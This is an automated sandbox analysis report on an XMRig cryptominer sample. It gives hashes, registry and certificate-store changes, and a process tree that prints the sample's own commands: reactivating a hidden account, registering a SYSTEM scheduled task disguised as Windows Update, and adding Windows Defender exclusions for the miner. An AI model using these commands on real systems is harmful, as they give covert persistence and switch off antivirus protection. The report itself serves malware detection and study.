xmrig | 7ece8e0973bdd09081b496e90d84e88152a60bfdd98123372fc3aed1c9d49863

Analysis

max time kernel
136s
max time network
150s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
29-03-2024 10:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
Size

5.2MB
MD5

1f1f27deffe539d99e12d720f1fbd7da
SHA1

a021497f416dded6636e88d8955a3a7632fbfcf2
SHA256

7ece8e0973bdd09081b496e90d84e88152a60bfdd98123372fc3aed1c9d49863
SHA512

2c4f8b7cf581a3ca57d7463e410a9f58bb484fef0708f15106db4c1601ebda739eef5bde96bad48e38367d53637a3deac94443d6fbf8b3d907b8838e054b1522
SSDEEP

98304:5L6uEe3WyV1kpTAuLz2LgdOnV5N2Vv9Pe11dHO2:5oe3Wy/qEuLz20ne1DHO2

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe	xmrig
C:\Users\Administrator\Appdata\Local\Temp\Windows\Windows_Defender.exe	xmrig

Executes dropped EXE 2 IoCs

Processes:

zxmcjdm.exezxmcjdm.exe

pid process

1544 zxmcjdm.exe
2108 zxmcjdm.exe
Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

2040 powershell.exe

pid	process
1544	zxmcjdm.exe
2108	zxmcjdm.exe

pid	process
2040	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows 10 Defence Agent = "\"C:\\Users\\Administrator\\Appdata\\Local\\Temp\\Windows\\StartDown.vbs\""	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Windows 10 Defence Agent = "\"C:\\Users\\Administrator\\Appdata\\Local\\Temp\\Windows\\StartDown.vbs\""	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe

Kills process with taskkill 10 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2444	taskkill.exe
2588	taskkill.exe
2936	taskkill.exe
2336	taskkill.exe
796	taskkill.exe
752	taskkill.exe
304	taskkill.exe
320	taskkill.exe
332	taskkill.exe
2744	taskkill.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1700	powershell.exe
2548	powershell.exe
2548	powershell.exe
2588	powershell.exe
2460	powershell.exe
2580	powershell.exe
2024	powershell.exe
2024	powershell.exe
2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
808	powershell.exe
808	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
2292	powershell.exe
2292	powershell.exe
2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
2768	powershell.exe
2768	powershell.exe
2000	powershell.exe
2000	powershell.exe
2000	powershell.exe
2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exepowershell.exezxmcjdm.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exezxmcjdm.exe

description	pid	process
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	796	taskkill.exe
Token: SeDebugPrivilege	332	taskkill.exe
Token: SeDebugPrivilege	304	taskkill.exe
Token: SeDebugPrivilege	752	taskkill.exe
Token: SeDebugPrivilege	808	powershell.exe
Token: SeDebugPrivilege	320	taskkill.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeLockMemoryPrivilege	1544	zxmcjdm.exe
Token: SeLockMemoryPrivilege	1544	zxmcjdm.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	2744	taskkill.exe
Token: SeDebugPrivilege	2336	taskkill.exe
Token: SeDebugPrivilege	2444	taskkill.exe
Token: SeDebugPrivilege	2936	taskkill.exe
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeLockMemoryPrivilege	2108	zxmcjdm.exe
Token: SeLockMemoryPrivilege	2108	zxmcjdm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exepowershell.exenet.execmd.execmd.execmd.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 2968 wrote to memory of 2976	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	whoami.exe
PID 2968 wrote to memory of 2976	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	whoami.exe
PID 2968 wrote to memory of 2976	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	whoami.exe
PID 2968 wrote to memory of 1700	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 1700	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 1700	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 1700 wrote to memory of 2524	1700	powershell.exe	net.exe
PID 1700 wrote to memory of 2524	1700	powershell.exe	net.exe
PID 1700 wrote to memory of 2524	1700	powershell.exe	net.exe
PID 2524 wrote to memory of 2560	2524	net.exe	net1.exe
PID 2524 wrote to memory of 2560	2524	net.exe	net1.exe
PID 2524 wrote to memory of 2560	2524	net.exe	net1.exe
PID 2968 wrote to memory of 2548	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2548	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2548	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2580	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2580	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2580	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2588	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2588	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2588	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2460	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2460	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2460	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2024	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2024	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2024	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 476	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 476	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 476	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1108	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1108	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1108	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1092	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1092	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1092	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1304	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1304	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1304	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1572	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1572	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 1572	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 2968 wrote to memory of 808	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 808	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 808	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 476 wrote to memory of 796	476	cmd.exe	taskkill.exe
PID 476 wrote to memory of 796	476	cmd.exe	taskkill.exe
PID 476 wrote to memory of 796	476	cmd.exe	taskkill.exe
PID 1092 wrote to memory of 332	1092	cmd.exe	taskkill.exe
PID 1092 wrote to memory of 332	1092	cmd.exe	taskkill.exe
PID 1092 wrote to memory of 332	1092	cmd.exe	taskkill.exe
PID 1572 wrote to memory of 752	1572	cmd.exe	taskkill.exe
PID 1572 wrote to memory of 752	1572	cmd.exe	taskkill.exe
PID 1572 wrote to memory of 752	1572	cmd.exe	taskkill.exe
PID 1108 wrote to memory of 304	1108	cmd.exe	taskkill.exe
PID 1108 wrote to memory of 304	1108	cmd.exe	taskkill.exe
PID 1108 wrote to memory of 304	1108	cmd.exe	taskkill.exe
PID 1304 wrote to memory of 320	1304	cmd.exe	taskkill.exe
PID 1304 wrote to memory of 320	1304	cmd.exe	taskkill.exe
PID 1304 wrote to memory of 320	1304	cmd.exe	taskkill.exe
PID 2968 wrote to memory of 2040	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2040	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2968 wrote to memory of 2040	2968	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2040 wrote to memory of 1544	2040	powershell.exe	zxmcjdm.exe

C:\Users\Admin\AppData\Local\Temp\1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe"
1⤵
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2968

C:\Windows\system32\whoami.exe
whoami /priv
2⤵
PID:2976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "net user Defaultaccount /active:yes"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" user Defaultaccount /active:yes
3⤵
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Defaultaccount /active:yes
4⤵
PID:2560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "$getdate = (get-date).AddMinutes(1).ToString('HH:mm:ss');$trigger = New-ScheduledTaskTrigger -Daily -DaysInterval 1 -RandomDelay '00:00' -At $getdate; $Trigger.Repetition = $(New-ScheduledTaskTrigger -Once -RandomDelay '00:0' -At $getdate -RepetitionDuration (New-TimeSpan -Days 9000) -RepetitionInterval '00:10').Repetition;$User= 'NT AUTHORITY\SYSTEM';$Action= New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument 'C:\Users\Administrator\Appdata\Local\Temp\Windows\StartDown.vbs';Register-ScheduledTask -TaskName 'wuaserv' -Description 'Windows Update Service' -Trigger $Trigger -User $User -Action $Action -RunLevel Highest -Force -ErrorAction SilentlyContinue"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "Add-MpPreference -ExclusionPath C:\Users\Administrator\Appdata\Local\Temp\Windows"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "Set-MpPreference -ExclusionProcess zxmcjdm.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\system32\cmd.exe
"cmd" "/c taskkill /im zzmsahbg.exe /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:476

C:\Windows\system32\taskkill.exe
taskkill /im zzmsahbg.exe /f"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:796

C:\Windows\system32\cmd.exe
